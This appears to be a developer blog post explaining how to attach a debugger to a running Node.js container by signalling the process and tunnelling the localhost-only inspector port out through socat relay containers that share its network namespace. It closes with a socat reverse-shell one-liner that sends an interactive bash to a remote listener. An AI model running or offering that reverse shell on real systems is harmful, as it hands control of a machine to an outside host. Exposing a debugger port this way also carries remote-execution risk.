A few days ago I needed to attach a debugger to a node container running in a
cloud environment. The simplest solution would be to change the task definition
to include --inspect
and restart the instance. However, in this case, my bug
was difficult to reproduce and occurred intermittently after several hours.
Rebooting was not an option.
It turns out that a node process will start its debugger if you send it a SIGUSR1 signal. The debugger only listens on localhost (127.0.0.1:9229 by default), which means it won't let my remote debugger attach. However, if it were possible to route my traffic to the inside of the container, we'd have a debugger!
# send SIGUSR1 to the node process (PID 1 in the container) to enable the debugger
docker exec -it $CONTAINER_ID kill -USR1 1
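If the node process writes its output to the container's stdout/stderr, we can confirm the debugger actually came up by checking the logs (the exact wording varies between node versions):
# look for a line like: Debugger listening on ws://127.0.0.1:9229/<uuid>
docker logs --tail 5 $CONTAINER_ID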
Recently I found a video by
LiveOverflow which describes how
docker isolation works. I'd recommend watching it, as it really helped connect
some dots for me. The gist of it is that containers owe most of their
isolation to the Linux kernel. When the container is started, docker will make
an unshare()
system call, which moves the process into its own sandboxed
namespace. Inside the sandbox, a process can do whatever it likes without
affecting anything outside it. If we could start another process inside the
same namespace, perhaps we could tunnel some traffic to the outside world.
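To get a feel for what that isolation looks like, here is a rough illustration using the unshare utility (not literally what docker runs): a process dropped into a fresh network namespace sees nothing but a downed loopback interface.
# requires root: run ip inside a brand new network namespace
# the output shows only lo, and it is DOWN
sudo unshare --net ip addr show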
docker run --network=container:<container id> to the rescue!
This flag tells docker to start a new container, but instead of creating a new network namespace, it re-uses the network namespace of the container whose id we pass it. Let's boot up a little relay to smuggle out the traffic.
docker run --rm -d --name socat-nid \
  --network=container:$CONTAINER_ID \
  alpine/socat \
  TCP-LISTEN:9339,fork TCP:127.0.0.1:9229
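If you want to convince yourself that the relay really landed inside the node container's network namespace, compare the namespace of PID 1 in each container (assuming readlink exists in both images); both commands should print the same net:[...] inode.
# the node container and the relay container share one network namespace
docker exec $CONTAINER_ID readlink /proc/1/ns/net
docker exec socat-nid readlink /proc/1/ns/net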
After running the relay command we find ourselves with a setup like this: we've opened a new port, 9339, but it's still stuck inside the container! It doesn't look like we have achieved much here, but unlike the node port, the new one doesn't care whether a request comes from localhost.
Unfortunately, this isn't the end of our work. Docker won't let you reach a port inside a container from outside the host unless the container published it (with -p) at startup, and publishing a port is yet another thing we can't do without restarting the container.
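You can see the problem for yourself: docker port lists a container's published port mappings, and for our container it prints nothing.
# no output: neither 9229 nor 9339 is published to the outside world
docker port $CONTAINER_ID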
But other containers can reach this port! What if we used our socat trick one more time to tunnel from the host machine to our new port?
# first find the IP of the container to instrument
IP=$(docker inspect -f "{{.NetworkSettings.IPAddress}}" $CONTAINER_ID)
# start another tunnel container, this time publishing port 9449 on the host
docker run --rm -d -p 9449:9449 \
  --name socat \
  alpine/socat \
  TCP-LISTEN:9449,fork TCP:$IP:9339
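Before pointing a debugger at it, we can check that the tunnel is wired up end to end. The inspector also speaks HTTP, so hitting its /json/list endpoint through the new port should return the debuggable target (assuming curl is available on the host):
# should print JSON for the node process, including a webSocketDebuggerUrl
curl http://localhost:9449/json/list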
That's it! Connections to port 9449 will tunnel all the way through to the node container, bypass the localhost restriction, and let us attach a debugger, leaving node none the wiser!
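From here, attaching works like it does against any remote inspector. For example, with a hypothetical $REMOTE_HOST pointing at the docker host, node's built-in debugger client can connect straight through the tunnel; a Chrome DevTools connection added under chrome://inspect works just as well.
# attach node's CLI debugger through the tunnel ($REMOTE_HOST is the docker host's address)
node inspect $REMOTE_HOST:9449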
This concept isn't new; I found it described in a blog post when I was first trying to debug the issue. In this post, I've tried to strip the concept down to its parts and dive deeper into the docker internals that make it work.
socat trick
Before trying this I'd never heard of socat. While reading up about it for this post I found some very interesting uses. Here is a super dirty (plaintext!) reverse shell!
# start a listener on the public server
nc -lp 3180
# execute on the machine you want to access
socat exec:'bash -i',pty,stderr tcp:<public server address>:3180